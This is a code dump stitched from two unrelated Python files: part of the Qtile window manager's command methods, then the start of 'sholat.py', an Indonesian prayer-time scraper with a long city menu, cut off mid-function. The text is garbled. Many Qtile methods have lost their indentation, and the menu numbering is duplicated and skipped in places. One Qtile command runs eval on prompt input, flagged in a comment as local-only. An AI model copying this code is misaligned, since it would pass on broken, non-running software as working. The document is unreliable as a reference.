        self.log.setLevel(logging.DEBUG)
        self.log.debug('Switching to DEBUG threshold')
    def cmd_info(self):
        """Set the log level to INFO."""
        self.log.setLevel(logging.INFO)
        self.log.info('Switching to INFO threshold')
    def cmd_warning(self):
        """Set the log level to WARNING."""
        self.log.setLevel(logging.WARNING)
        self.log.warning('Switching to WARNING threshold')
    def cmd_error(self):
        """Set the log level to ERROR."""
        self.log.setLevel(logging.ERROR)
        self.log.error('Switching to ERROR threshold')
    def cmd_critical(self):
        """Set the log level to CRITICAL."""
        self.log.setLevel(logging.CRITICAL)
        self.log.critical('Switching to CRITICAL threshold')
    def cmd_pause(self):
        """Drop into pdb (blocks the event loop until you continue)."""
        import pdb
        pdb.set_trace()
def cmd_groups(self):
"""
Return a dictionary containing information for all groups.
Example:
groups()
"""
return dict((i.name, i.info()) for i in self.groups)
def cmd_list_widgets(self):
"""
List of all addressible widget names.
"""
return list(self.widgetMap.keys())
    def cmd_nextlayout(self, group=None):
        """
        This method will be deprecated in favor of cmd_next_layout.
        Use lazy.next_layout(g) in your config instead.
        """
        # The docstring doubles as the runtime deprecation message below,
        # so its text must stay as-is.
        deprecated(Qtile.cmd_nextlayout.__doc__)
        self.cmd_next_layout(group)
def cmd_next_layout(self, group=None):
"""
Switch to the next layout.
:group Group name. If not specified, the current group is assumed.
"""
if group:
group = self.groupMap.get(group)
else:
group = self.currentGroup
group.nextLayout()
    def cmd_prevlayout(self, group=None):
        """
        This method will be deprecated in favor of cmd_prev_layout.
        Use lazy.prev_layout(g) in your config instead.
        """
        # The docstring doubles as the runtime deprecation message below,
        # so its text must stay as-is.
        deprecated(Qtile.cmd_prevlayout.__doc__)
        self.cmd_prev_layout(group)
def cmd_prev_layout(self, group=None):
"""
Switch to the prev layout.
:group Group name. If not specified, the current group is assumed.
"""
if group:
group = self.groupMap.get(group)
else:
group = self.currentGroup
group.prevLayout()
def cmd_screens(self):
"""
Return a list of dictionaries providing information on all screens.
"""
lst = []
for i in self.screens:
lst.append(dict(
index=i.index,
group=i.group.name if i.group is not None else None,
x=i.x,
y=i.y,
width=i.width,
height=i.height,
gaps=dict(
top=i.top.geometry() if i.top else None,
bottom=i.bottom.geometry() if i.bottom else None,
left=i.left.geometry() if i.left else None,
right=i.right.geometry() if i.right else None,
)
))
return lst
    def cmd_simulate_keypress(self, modifiers, key):
        """
        Simulates a keypress on the focused window.
        :modifiers A list of modifier specification strings. Modifiers can
        be one of "shift", "lock", "control" and "mod1" - "mod5".
        :key Key specification.
        Examples:
            simulate_keypress(["control", "mod2"], "k")
        """
        # FIXME: This needs to be done with sendevent, once we have that fixed.
        keysym = xcbq.keysyms.get(key)
        if keysym is None:
            raise command.CommandError("Unknown key: %s" % key)
        keycode = self.conn.first_sym_to_code[keysym]
        # Minimal stand-in for an X KeyPress event: handle_KeyPress only
        # reads .detail and .state.
        class DummyEv:
            pass
        d = DummyEv()
        d.detail = keycode
        try:
            d.state = utils.translateMasks(modifiers)
        except KeyError as v:
            return v.args[0]
        self.handle_KeyPress(d)
    def cmd_execute(self, cmd, args):
        """
        Executes the specified command, replacing the current process.
        """
        # Run registered exit handlers first, since execv() never returns.
        atexit._run_exitfuncs()
        os.execv(cmd, args)
    def cmd_restart(self):
        """
        Restart qtile using the execute command.
        """
        argv = [sys.executable] + sys.argv
        if '--no-spawn' not in argv:
            argv.append('--no-spawn')
        # Serialize current state so the new process can restore groups etc.
        buf = six.BytesIO()
        pickle.dump(QtileState(self), buf, protocol=0)
        # Replace any stale state argument with the fresh one.
        argv = [s for s in argv if not s.startswith('--with-state')]
        argv.append('--with-state=' + buf.getvalue().decode())
        self.cmd_execute(sys.executable, argv)
    def cmd_spawn(self, cmd):
        """
        Run cmd (tokenized with shlex; no actual shell is involved).
        Example:
            spawn("firefox")
        """
        # Double-fork so the spawned process is reparented to init and never
        # becomes a zombie of qtile; the intermediate child writes the
        # grandchild's pid back through a pipe.
        args = shlex.split(cmd)
        r, w = os.pipe()
        pid = os.fork()
        if pid < 0:
            os.close(r)
            os.close(w)
            return pid
        if pid == 0:
            os.close(r)
            # close qtile's stdin, stdout, stderr so the called process doesn't
            # pollute our xsession-errors.
            os.close(0)
            os.close(1)
            os.close(2)
            pid2 = os.fork()
            if pid2 == 0:
                os.close(w)
                # Open /dev/null as stdin, stdout, stderr
                try:
                    fd = os.open(os.devnull, os.O_RDWR)
                except OSError:
                    # This shouldn't happen, catch it just in case
                    pass
                else:
                    if fd > 0:
                        # Again, this shouldn't happen, but we should just check
                        os.dup2(fd, 0)
                        os.dup2(fd, 1)
                        os.dup2(fd, 2)
                try:
                    os.execvp(args[0], args)
                except OSError:
                    pass
                os._exit(1)
            else:
                # Here it doesn't matter if fork failed or not, we just write
                # its return code and exit.
                os.write(w, str(pid2).encode())
                os.close(w)
                # sys.exit raises SystemExit, which will then be caught by our
                # top level catchall and we'll end up with two qtiles; os._exit
                # actually calls exit.
                os._exit(0)
        else:
            os.close(w)
            os.waitpid(pid, 0)
            # 1024 bytes should be enough for any pid. :)
            pid = os.read(r, 1024)
            os.close(r)
            return int(pid)
def cmd_status(self):
"""
Return "OK" if Qtile is running.
"""
return "OK"
    def cmd_sync(self):
        """
        Sync the X display. Should only be used for development.
        """
        # Sends any buffered X requests out to the server.
        self.conn.flush()
def cmd_to_screen(self, n):
"""
Warp focus to screen n, where n is a 0-based screen number.
Example:
to_screen(0)
"""
return self.toScreen(n)
    def cmd_to_next_screen(self):
        """
        This method will be deprecated in favor of cmd_next_screen.
        Use lazy.next_screen in your config instead.
        """
        # The docstring doubles as the runtime deprecation message below,
        # so its text must stay as-is.
        deprecated(Qtile.cmd_to_next_screen.__doc__)
        return self.cmd_next_screen()
def cmd_next_screen(self):
"""
Move to next screen
"""
return self.toScreen(
(self.screens.index(self.currentScreen) + 1) % len(self.screens)
)
    def cmd_to_prev_screen(self):
        """
        This method will be deprecated in favor of cmd_prev_screen.
        Use lazy.prev_screen in your config instead.
        """
        # The docstring doubles as the runtime deprecation message below,
        # so its text must stay as-is.
        deprecated(Qtile.cmd_to_prev_screen.__doc__)
        return self.cmd_prev_screen()
def cmd_prev_screen(self):
"""
Move to the previous screen
"""
return self.toScreen(
(self.screens.index(self.currentScreen) - 1) % len(self.screens)
)
    def cmd_windows(self):
        """
        Return an info dict for each managed (non-internal) client window.
        """
        return [
            i.info() for i in self.windowMap.values()
            if not isinstance(i, window.Internal)
        ]
    def cmd_internal_windows(self):
        """
        Return an info dict for each internal window (bars, for example).
        """
        return [
            i.info() for i in self.windowMap.values()
            if isinstance(i, window.Internal)
        ]
def cmd_qtile_info(self):
"""
Returns a dictionary of info on the Qtile instance.
"""
return dict(socketname=self.fname)
def cmd_shutdown(self):
"""
Quit Qtile.
"""
self._eventloop.stop()
    def cmd_switch_groups(self, groupa, groupb):
        """
        Swap the positions of *groupa* and *groupb* in the group list.
        """
        if groupa not in self.groupMap or groupb not in self.groupMap:
            return
        indexa = self.groups.index(self.groupMap[groupa])
        indexb = self.groups.index(self.groupMap[groupb])
        self.groups[indexa], self.groups[indexb] = \
            self.groups[indexb], self.groups[indexa]
        hook.fire("setgroup")
        # update window _NET_WM_DESKTOP
        for group in (self.groups[indexa], self.groups[indexb]):
            for w in group.windows:
                w.group = group
def find_window(self, wid):
window = self.windowMap.get(wid)
if window:
if not window.group.screen:
self.currentScreen.setGroup(window.group)
window.group.focus(window, False)
def cmd_findwindow(self, prompt="window", widget="prompt"):
mb = self.widgetMap.get(widget)
if not mb:
self.log.error("No widget named '%s' present." % widget)
return
mb.startInput(
prompt,
self.find_window,
"window",
strict_completer=True
)
def cmd_next_urgent(self):
try:
nxt = [w for w in self.windowMap.values() if w.urgent][0]
nxt.group.cmd_toscreen()
nxt.group.focus(nxt, False)
except IndexError:
pass # no window had urgent set
    def cmd_togroup(self, prompt="group", widget="prompt"):
        """
        Move current window to the selected group in a prompt widget.
        prompt: Text with which to prompt user.
        widget: Name of the prompt widget (default: "prompt").
        """
        if not self.currentWindow:
            self.log.warning("No window to move")
            return
        mb = self.widgetMap.get(widget)
        if not mb:
            self.log.error("No widget named '%s' present." % widget)
            return
        mb.startInput(prompt, self.moveToGroup, "group", strict_completer=True)
    def cmd_switchgroup(self, prompt="group", widget="prompt"):
        """Prompt for a group name and bring that group to the current screen.

        prompt: Text with which to prompt user.
        widget: Name of the prompt widget (default: "prompt").
        """
        # Completion callback invoked by the prompt widget.
        def f(group):
            if group:
                try:
                    self.groupMap[group].cmd_toscreen()
                except KeyError:
                    self.log.info("No group named '%s' present." % group)
                    pass
        mb = self.widgetMap.get(widget)
        if not mb:
            self.log.warning("No widget named '%s' present." % widget)
            return
        mb.startInput(prompt, f, "group", strict_completer=True)
    def cmd_spawncmd(self, prompt="spawn", widget="prompt",
                     command="%s", complete="cmd"):
        """
        Spawn a command using a prompt widget, with tab-completion.
        prompt: Text with which to prompt user (default: "spawn: ").
        widget: Name of the prompt widget (default: "prompt").
        command: command template (default: "%s").
        complete: Tab completion function (default: "cmd")
        """
        # Completion callback: substitute the user's input into the template.
        def f(args):
            if args:
                self.cmd_spawn(command % args)
        try:
            mb = self.widgetMap[widget]
            mb.startInput(prompt, f, complete)
        except KeyError:
            self.log.error("No widget named '%s' present." % widget)
    def cmd_qtilecmd(self, prompt="command",
                     widget="prompt", messenger="xmessage"):
        """
        Execute a Qtile command using the client syntax.
        Tab completion aids navigation of the command tree.
        prompt: Text to display at the prompt (default: "command: ").
        widget: Name of the prompt widget (default: "prompt").
        messenger: command to display output (default: "xmessage").
            Set this to None to disable.
        """
        def f(cmd):
            if cmd:
                # c here is used in eval() below
                c = command.CommandRoot(self)  # noqa
                try:
                    cmd_arg = str(cmd).split(' ')
                except AttributeError:
                    return
                cmd_len = len(cmd_arg)
                if cmd_len == 0:
                    self.log.info('No command entered.')
                    return
                try:
                    # SECURITY: eval of user-entered prompt text. Only
                    # acceptable because the input comes from the local
                    # user's own prompt widget.
                    # NOTE(review): err.message is Python 2-only; on
                    # Python 3 this error path itself raises -- confirm.
                    result = eval('c.%s' % (cmd))
                except (
                        command.CommandError,
                        command.CommandException,
                        AttributeError) as err:
                    self.log.error(err.message)
                    result = None
                if result is not None:
                    from pprint import pformat
                    message = pformat(result)
                    if messenger:
                        self.cmd_spawn('%s "%s"' % (messenger, message))
                    self.log.info(result)
        mb = self.widgetMap[widget]
        if not mb:
            self.log.error("No widget named %s present." % widget)
            return
        mb.startInput(prompt, f, "qsh")
def cmd_addgroup(self, group):
return self.addGroup(group)
def cmd_delgroup(self, group):
return self.delGroup(group)
    def cmd_add_rule(self, match_args, rule_args, min_priorty=False):
        """
        Add a dgroup rule; returns the rule_id needed to remove it.
        param: match_args (config.Match arguments)
        param: rule_args (config.Rule arguments)
        param: min_priorty whether the rule is added with minimum priority (last)
        """
        if not self.dgroups:
            self.log.warning('No dgroups created')
            return
        match = Match(**match_args)
        rule = Rule(match, **rule_args)
        return self.dgroups.add_rule(rule, min_priorty)
def cmd_remove_rule(self, rule_id):
self.dgroups.remove_rule(rule_id)
    def cmd_run_external(self, full_path):
        """Load *full_path* as a module and call its main(qtile).

        Captures stdout plus any error text and returns them combined.
        NOTE(review): sys.exc_clear() and the imp module exist only on
        Python 2 -- this command will fail on Python 3; confirm the
        supported interpreter before relying on it.
        """
        def format_error(path, e):
            s = """Can't call "main" from "{path}"\n\t{err_name}: {err}"""
            return s.format(path=path, err_name=e.__class__.__name__, err=e)
        module_name = os.path.splitext(os.path.basename(full_path))[0]
        dir_path = os.path.dirname(full_path)
        err_str = ""
        # Temporarily redirect stdout so the external script's prints are
        # captured and returned to the caller.
        local_stdout = six.BytesIO()
        old_stdout = sys.stdout
        sys.stdout = local_stdout
        sys.exc_clear()
        try:
            fp, pathname, description = imp.find_module(module_name, [dir_path])
            module = imp.load_module(module_name, fp, pathname, description)
            module.main(self)
        except ImportError as e:
            fp = None
            err_str += format_error(full_path, e)
        except:
            (exc_type, exc_value, exc_traceback) = sys.exc_info()
            err_str += traceback.format_exc()
            err_str += format_error(full_path, exc_type(exc_value))
        finally:
            sys.exc_clear()
            sys.stdout = old_stdout
            if fp:
                fp.close()
        return local_stdout.getvalue() + err_str
    def cmd_hide_show_bar(self, position="all"):
        """
        Toggle visibility of the bar(s) on the current screen.
        param: position one of: "top", "bottom", "left", "right" or "all"
        """
        if position in ["top", "bottom", "left", "right"]:
            bar = getattr(self.currentScreen, position)
            if bar:
                bar.show(not bar.is_show())
                self.currentGroup.layoutAll()
            else:
                self.log.warning(
                    "Not found bar in position '%s' for hide/show." % position)
        elif position == "all":
            screen = self.currentScreen
            is_show = None
            # Toggle every bar to the same state, derived from the first
            # bar found.
            for bar in [screen.left, screen.right, screen.top, screen.bottom]:
                if bar:
                    if is_show is None:
                        is_show = not bar.is_show()
                    bar.show(is_show)
            if is_show is not None:
                self.currentGroup.layoutAll()
            else:
                self.log.warning("Not found bar for hide/show.")
        else:
            self.log.error("Invalid position value:%s" % position)
|
sholat.py | # sholat
# karjok pangesty
# created 31, januari 2019 2:18 pm
# updated 25 march 2020 9:14 AM
#-*-coding : utf-8-*-
'''
PLEASE READ FIRST !!!
-----------------------
The code is open source; you are welcome to study it.
But please do not copy this script without crediting its source (in this case, my repo).
So please respect people's work, however imperfect it may be.
'Oh my God, the program "just big open source is not segregated, until notice everything"
Who says it ??
author program "big also give notice in each readme or documentation, you wrote the DOC.
yes,
I realized my writing was very messy,
not neat, careless origin, because it is still learning.
but believe me.
This is the result of my efforts.
I made this twice.
made it first, but instead there was a problem, it disappeared. and even then finished 3 days & night to finish.
I sincerely and i made again
the time is almost the same, but this is a little faster because I already know the flow of the code.
so making the program is not easy.
respect, even if it's just writing
'thanks to: blablabla'
I'm sure those who are already pro, definitely consider this rubbish.
it's okay.
I also believe that if it's already a pro, it's not possible to copy "this program.
but you guys are still learning, I'm not sure.
I hope it's useful .
'''
import sys,os, random
import subprocess as sp
import requests
from time import sleep
from time import strftime as tm
from requests import get
from bs4 import BeautifulSoup as bs
from threading import Thread
##############
# ANSI terminal colour codes used throughout the UI.
lgr='\033[90m'  # dark grey
lr= '\033[91m'  # light red
lg= '\033[92m'  # light green
lw= '\033[97m'  # bright white
x = '\033[0m'   # reset to default
#ngambil jadwal hari ini
def gettime():
    """Download today's prayer times from jadwalsholat.org and cache them.

    The town id is read from .cookie/ts (created via gettown() when missing,
    defaulting to '83' = Jakarta).  The highlighted row of the monthly table
    is written to .cookie/sc as:
    day,imsak,subuh,dzuhur,ashar,maghrib,isya,town-name
    """
    print(lg+'Updating schedule..')
    try:
        with open('.cookie/ts','r') as f:
            ts = f.read()
    except IOError:
        # No cached town yet: ask the user, then re-read the cache.
        gettown()
        with open('.cookie/ts','r') as f:
            ts = f.read()
    if len(ts) == 0:
        ts = '83'  # empty cache file -> fall back to Jakarta
    try:
        r = get('https://www.jadwalsholat.org/adzan/monthly.php?id='+ts)
    except requests.exceptions.ConnectionError:
        # BUG FIX: the original used '\ n' (an invalid escape that printed
        # literally) and then fell through to use the undefined `r` after
        # menu() returned; return instead.
        print(lg+'\nAstaghfirullah .. \nUkhty forgot to turn on the network'+x)
        input(lg+'\nJust entering')
        menu()
        return
    b = bs(r.text,'html.parser')
    tr= b.find('tr',class_="table_highlight")
    with open('.cookie/sc','w') as sc:
        kota = b.find('option', attrs={'value':ts})
        i= tr.find_all('td')
        sc.write(i[0].text+','+i[1].text+','+i[2].text+','+i[5].text+','+i[6].text+','+i[7].text+','+i[8].text+','+kota.text)
def gettown():
    """Show the city list, ask the user to pick one and cache the mapped
    jadwalsholat.org town id in .cookie/ts, then refresh the schedule."""
    print(
    lg+"""1. """+lw+"""Ambarawa """+lg+"""78. """+lw+"""Gombong """+lg+"""155. """+lw+"""Mentok """+lg+"""232. """+lw+"""Selong"""+
    lg+"""\n2. """+lw+"""Ambon """+lg+"""79. """+lw+"""Gorontalo """+lg+"""163. """+lw+"""Merauke """+lg+"""233. """+lw+"""Semarang"""+
    lg+"""\n3. """+lw+"""Amlapura """+lg+"""80. """+lw+"""Gresik """+lg+"""157. """+lw+"""Metro """+lg+"""234. """+lw+"""Sengkang"""+
    lg+"""\n4. """+lw+"""Amuntai """+lg+"""81. """+lw+"""Gunung Sit """+lg+"""158. """+lw+"""Meulaboh """+lg+"""235. """+lw+"""Serang"""+
    lg+"""\n5. """+lw+"""Argamakmur """+lg+"""82. """+lw+"""Indramayu """+lg+"""159. """+lw+"""Mojokerto """+lg+"""236. """+lw+"""Serui"""+
    lg+"""\n6. """+lw+"""Atambua """+lg+"""83. """+lw+"""Jakarta """+lg+"""160. """+lw+"""Muara Buli """+lg+"""237. """+lw+"""Sibolga"""+
    lg+"""\n7. """+lw+"""Babo """+lg+"""84. """+lw+"""Jambi """+lg+"""161. """+lw+"""Muara Bung """+lg+"""238. """+lw+"""Sidikalang"""+
    lg+"""\n8. """+lw+"""Bagan Siap """+lg+"""85. """+lw+"""Jayapura """+lg+"""162. """+lw+"""Muara Enim """+lg+"""239. """+lw+"""Sidoarjo"""+
    lg+"""\n9. """+lw+"""Bajawa """+lg+"""86. """+lw+"""Jember """+lg+"""163. """+lw+"""Muara Tewe """+lg+"""240. """+lw+"""Sigli"""+
    lg+"""\n10. """+lw+"""Balige """+lg+"""87. """+lw+"""Jeneponto """+lg+"""164. """+lw+"""Muaro Siju """+lg+"""241. """+lw+"""Singaparna"""+
    lg+"""\n11. """+lw+"""Balik Papa """+lg+"""88. """+lw+"""Jepara """+lg+"""165. """+lw+"""Muntilan """+lg+"""242. """+lw+"""Singaraja"""+
    lg+"""\n12. """+lw+"""Banda Aceh """+lg+"""89. """+lw+"""Jombang """+lg+"""166. """+lw+"""Nabire """+lg+"""243. """+lw+"""Singkawang"""+
    lg+"""\n13. """+lw+"""Bandarlamp """+lg+"""90. """+lw+"""Kabanjahe """+lg+"""167. """+lw+"""Negara """+lg+"""244. """+lw+"""Sinjai"""+
    lg+"""\n14. """+lw+"""Bandung """+lg+"""91. """+lw+"""Kalabahi """+lg+"""168. """+lw+"""Nganjuk """+lg+"""245. """+lw+"""Sintang"""+
    lg+"""\n15. """+lw+"""Bangkalan """+lg+"""92. """+lw+"""Kalianda """+lg+"""169. """+lw+"""Ngawi """+lg+"""246. """+lw+"""Situbondo"""+
    lg+"""\n16. """+lw+"""Bangkinang """+lg+"""93. """+lw+"""Kandangan """+lg+"""170. """+lw+"""Nunukan """+lg+"""247. """+lw+"""Slawi"""+
    lg+"""\n17. """+lw+"""Bangko """+lg+"""94. """+lw+"""Karanganya """+lg+"""171. """+lw+"""Pacitan """+lg+"""248. """+lw+"""Sleman"""+
    lg+"""\n18. """+lw+"""Bangli """+lg+"""95. """+lw+"""Karawang """+lg+"""172. """+lw+"""Padang """+lg+"""249. """+lw+"""Soasiu"""+
    lg+"""\n19. """+lw+"""Banjar """+lg+"""96. """+lw+"""Kasungan """+lg+"""173. """+lw+"""Padang Pan """+lg+"""250. """+lw+"""Soe"""+
    lg+"""\n20. """+lw+"""Banjar Bar """+lg+"""97. """+lw+"""Kayuagung """+lg+"""174. """+lw+"""Padang Sid """+lg+"""251. """+lw+"""Solo"""+
    lg+"""\n21. """+lw+"""Banjarmasi """+lg+"""98 . """+lw+"""Kebumen """+lg+"""175. """+lw+"""Pagaralam """+lg+"""252. """+lw+"""Solok"""+
    lg+"""\n22. """+lw+"""Banjarnega """+lg+"""99. """+lw+"""Kediri """+lg+"""176. """+lw+"""Painan """+lg+"""253. """+lw+"""Soreang"""+
    lg+"""\n23. """+lw+"""Bantaeng """+lg+"""100. """+lw+"""Kefamenanu """+lg+"""177. """+lw+"""Palangkara """+lg+"""254. """+lw+"""Sorong"""+
    lg+"""\n24. """+lw+"""Banten """+lg+"""101. """+lw+"""Kendal """+lg+"""178. """+lw+"""Palembang """+lg+"""255. """+lw+"""Sragen"""+
    lg+"""\n25. """+lw+"""Bantul """+lg+"""102. """+lw+"""Kendari """+lg+"""179. """+lw+"""Palopo """+lg+"""263. """+lw+"""Stabat"""+
    lg+"""\n26. """+lw+"""Banyuwangi """+lg+"""103. """+lw+"""Kertosono """+lg+"""180. """+lw+"""Palu """+lg+"""257. """+lw+"""Subang"""+
    lg+"""\n27. """+lw+"""Barabai """+lg+"""104. """+lw+"""Ketapang """+lg+"""181. """+lw+"""Pamekasan """+lg+"""258. """+lw+"""Sukabumi"""+
    lg+"""\n28. """+lw+"""Barito """+lg+"""105. """+lw+"""Kisaran """+lg+"""182. """+lw+"""Pandeglang """+lg+"""259. """+lw+"""Sukoharjo"""+
    lg+"""\n29. """+lw+"""Barru """+lg+"""106. """+lw+"""Klaten """+lg+"""183. """+lw+"""Pangkajene """+lg+"""260. """+lw+"""Sumbawa Be"""+
    lg+"""\n30. """+lw+"""Batam """+lg+"""107. """+lw+"""Kolaka """+lg+"""184. """+lw+"""Pangkajene """+lg+"""261. """+lw+"""Sumedang"""+
    lg+"""\n31. """+lw+"""Batang """+lg+"""108. """+lw+"""Kota Baru """+lg+"""185. """+lw+"""Pangkalanb """+lg+"""262. """+lw+"""Sumenep"""+
    lg+"""\n32. """+lw+"""Batu """+lg+"""109. """+lw+"""Kota Bumi """+lg+"""186. """+lw+"""Pangkalpin """+lg+"""263. """+lw+"""Sungai Lia"""+
    lg+"""\n33. """+lw+"""Baturaja """+lg+"""110. """+lw+"""Kota Janth """+lg+"""187. """+lw+"""Panyabunga """+lg+"""264. """+lw+"""Sungai Pen"""+
    lg+"""\n34. """+lw+"""Batusangka """+lg+"""111. """+lw+"""Kota Mobag """+lg+"""188. """+lw+"""Pare """+lg+"""265. """+lw+"""Sunggumina"""+
    lg+"""\n35. """+lw+"""Baubau """+lg+"""112. """+lw+"""Kuala Kapu """+lg+"""189. """+lw+"""Parepare """+lg+"""266. """+lw+"""Surabaya"""+
    lg+"""\n36. """+lw+"""Bekasi """+lg+"""113. """+lw+"""Kuala Kuru """+lg+"""190. """+lw+"""Pariaman """+lg+"""267. """+lw+"""Surakarta"""+
    lg+"""\n37. """+lw+"""Bengkalis """+lg+"""114. """+lw+"""Kuala Pemb """+lg+"""191. """+lw+"""Pasuruan """+lg+"""268. """+lw+"""Tabanan"""+
    lg+"""\n38. """+lw+"""Bengkulu """+lg+"""115. """+lw+"""Kuala Tung """+lg+"""192. """+lw+"""Pati """+lg+"""269. """+lw+"""Tahuna"""+
    lg+"""\n39. """+lw+"""Benteng """+lg+"""116. """+lw+"""Kudus """+lg+"""193. """+lw+"""Payakumbuh """+lg+"""270. """+lw+"""Takalar"""+
    lg+"""\n40. """+lw+"""Biak """+lg+"""117. """+lw+"""Kuningan """+lg+"""194. """+lw+"""Pekalongan """+lg+"""271. """+lw+"""Takengon"""+
    lg+"""\n41. """+lw+"""Bima """+lg+"""118. """+lw+"""Kupang """+lg+"""195. """+lw+"""Pekan Baru """+lg+"""272. """+lw+"""Tamiang La"""+
    lg+"""\n42. """+lw+"""Binjai """+lg+"""119. """+lw+"""Kutacane """+lg+"""196. """+lw+"""Pemalang """+lg+"""273. """+lw+"""Tanah Grog"""+
    lg+"""\n43. """+lw+"""Bireuen """+lg+"""120. """+lw+"""Kutoarjo """+lg+"""197. """+lw+"""Pematangsi """+lg+"""274. """+lw+"""Tangerang"""+
    lg+"""\n44. """+lw+"""Bitung """+lg+"""121. """+lw+"""Labuhan """+lg+"""198. """+lw+"""Pendopo """+lg+"""275. """+lw+"""Tanjung Ba"""+
    lg+"""\n45. """+lw+"""Blitar """+lg+"""122. """+lw+"""Lahat """+lg+"""199. """+lw+"""Pinrang """+lg+"""276. """+lw+"""Tanjung En"""+
    lg+"""\n46. """+lw+"""Blora """+lg+"""123. """+lw+"""Lamongan """+lg+"""200. """+lw+"""Pleihari """+lg+"""277. """+lw+"""Tanjung Pa"""+
    lg+"""\n47. """+lw+"""Bogor """+lg+"""124. """+lw+"""Langsa """+lg+"""201. """+lw+"""Polewali """+lg+"""278. """+lw+"""Tanjung Pi"""+
    lg+"""\n48. """+lw+"""Bojonegoro """+lg+"""125. """+lw+"""Larantuka """+lg+"""202. """+lw+"""Pondok Ged """+lg+"""279. """+lw+"""Tanjung Re"""+
    lg+"""\n49. """+lw+"""Bondowoso """+lg+"""126. """+lw+"""Lawang """+lg+"""203. """+lw+"""Ponorogo """+lg+"""280. """+lw+"""Tanjung Se"""+
    lg+"""\n50. """+lw+"""Bontang """+lg+"""127. """+lw+"""Lhoseumawe """+lg+"""204. """+lw+"""Pontianak """+lg+"""281. """+lw+"""Tapak Tuan"""+
    lg+"""\n51. """+lw+"""Boyolali """+lg+"""128. """+lw+"""Limboto """+lg+"""205. """+lw+"""Poso """+lg+"""282. """+lw+"""Tarakan"""+
    lg+"""\n52. """+lw+"""Brebes """+lg+"""129. """+lw+"""Lubuk Basu """+lg+"""206. """+lw+"""Prabumulih """+lg+"""283. """+lw+"""Tarutung"""+
    lg+"""\n53. """+lw+"""Bukit Ting """+lg+"""130. """+lw+"""Lubuk Ling """+lg+"""207. """+lw+"""Praya """+lg+"""284. """+lw+"""Tasikmalay"""+
    lg+"""\n54. """+lw+"""Bulukumba """+lg+"""131. """+lw+"""Lubuk Paka """+lg+"""208. """+lw+"""Probolingg """+lg+"""285. """+lw+"""Tebing Tin"""+
    lg+"""\n55. """+lw+"""Buntok """+lg+"""132. """+lw+"""Lubuk Sika """+lg+"""209. """+lw+"""Purbalingg """+lg+"""286. """+lw+"""Tegal"""+
    lg+"""\n63. """+lw+"""Cepu """+lg+"""133. """+lw+"""Lumajang """+lg+"""210. """+lw+"""Purukcahu """+lg+"""287. """+lw+"""Temanggung"""+
    lg+"""\n57. """+lw+"""Ciamis """+lg+"""134. """+lw+"""Luwuk """+lg+"""211. """+lw+"""Purwakarta """+lg+"""288. """+lw+"""Tembilahan"""+
    lg+"""\n58. """+lw+"""Cianjur """+lg+"""135. """+lw+"""Madiun """+lg+"""212. """+lw+"""Purwodadig """+lg+"""289. """+lw+"""Tenggarong"""+
    lg+"""\n59. """+lw+"""Cibinong """+lg+"""136. """+lw+"""Magelang """+lg+"""213. """+lw+"""Purwokerto """+lg+"""290. """+lw+"""Ternate"""+
    lg+"""\n60. """+lw+"""Cilacap """+lg+"""137. """+lw+"""Magetan """+lg+"""214. """+lw+"""Purworejo """+lg+"""291. """+lw+"""Tolitoli"""+
    lg+"""\n61. """+lw+"""Cilegon """+lg+"""138. """+lw+"""Majalengka """+lg+"""215. """+lw+"""Putussibau """+lg+"""292. """+lw+"""Tondano"""+
    lg+"""\n62. """+lw+"""Cimahi """+lg+"""139. """+lw+"""Majene """+lg+"""216. """+lw+"""Raha """+lg+"""293. """+lw+"""Trenggalek"""+
    lg+"""\n63. """+lw+"""Cirebon """+lg+"""140. """+lw+"""Makale """+lg+"""217. """+lw+"""Rangkasbit """+lg+"""294. """+lw+"""Tual"""+
    lg+"""\n64. """+lw+"""Curup """+lg+"""141. """+lw+"""Makassar """+lg+"""218. """+lw+"""Rantau """+lg+"""295. """+lw+"""Tuban"""+
    lg+"""\n65. """+lw+"""Demak """+lg+"""142. """+lw+"""Malang """+lg+"""219. """+lw+"""Rantauprap """+lg+"""296. """+lw+"""Tulung Agu"""+
    lg+"""\n66. """+lw+"""Denpasar """+lg+"""143. """+lw+"""Mamuju """+lg+"""220. """+lw+"""Rantepao """+lg+"""297. """+lw+"""Ujung Beru"""+
    lg+"""\n67. """+lw+"""Depok """+lg+"""144. """+lw+"""Manna """+lg+"""221. """+lw+"""Rembang """+lg+"""298. """+lw+"""Ungaran"""+
    lg+"""\n68. """+lw+"""Dili """+lg+"""145. """+lw+"""Manokwari """+lg+"""222. """+lw+"""Rengat """+lg+"""299. """+lw+"""Waikabubak"""+
    lg+"""\n69. """+lw+"""Dompu """+lg+"""146. """+lw+"""Marabahan """+lg+"""223. """+lw+"""Ruteng """+lg+"""300. """+lw+"""Waingapu"""+
    lg+"""\n70. """+lw+"""Donggala """+lg+"""147. """+lw+"""Maros """+lg+"""224. """+lw+"""Sabang """+lg+"""301. """+lw+"""Wamena"""+
    lg+"""\n71. """+lw+"""Dumai """+lg+"""148. """+lw+"""Martapura """+lg+"""225. """+lw+"""Salatiga """+lg+"""302. """+lw+"""Watampone"""+
    lg+"""\n72. """+lw+"""Ende """+lg+"""149. """+lw+"""Masohi """+lg+"""226. """+lw+"""Samarinda """+lg+"""303. """+lw+"""Watansoppe"""+
    lg+"""\n73. """+lw+"""Enggano """+lg+"""150. """+lw+"""Mataram """+lg+"""227. """+lw+"""Sampang """+lg+"""304. """+lw+"""Wates"""+
    lg+"""\n74. """+lw+"""Enrekang """+lg+"""151. """+lw+"""Maumere """+lg+"""228. """+lw+"""Sampit """+lg+"""305. """+lw+"""Wonogiri"""+
    lg+"""\n75. """+lw+"""Fakfak """+lg+"""152. """+lw+"""Medan """+lg+"""229. """+lw+"""Sanggau """+lg+"""306. """+lw+"""Wonosari"""+
    lg+"""\n76. """+lw+"""Garut """+lg+"""153. """+lw+"""Mempawah """+lg+"""230. """+lw+"""Sawahlunto """+lg+"""307. """+lw+"""Wonosobo"""+
    lg+"""\n77. """+lw+"""Gianyar """+lg+"""154. """+lw+"""Menado """+lg+"""231. """+lw+"""Sekayu """+lg+"""308. """+lw+"""Yogyakarta""")
    print(lg+'_'*63)
    inp = input(lg+'Pilih kota Anda:'+x)
    # Map the menu number to the site id.  Numbers above 83 are shifted down
    # by one because the menu numbering skips an id.
    if int(inp) <= 83:
        # BUG FIX: the original used `<= 82`, so choosing 83 (Jakarta, the
        # application's own default id) fell through to the '308' fallback.
        pass
    elif int(inp) > 83 and int(inp) <= 204:
        inp = str(int(inp)-1)
    elif int(inp) >= 205:
        inp = str(int(inp)-1)
    else:
        inp = '308'
    with open('.cookie/ts','w') as ts:
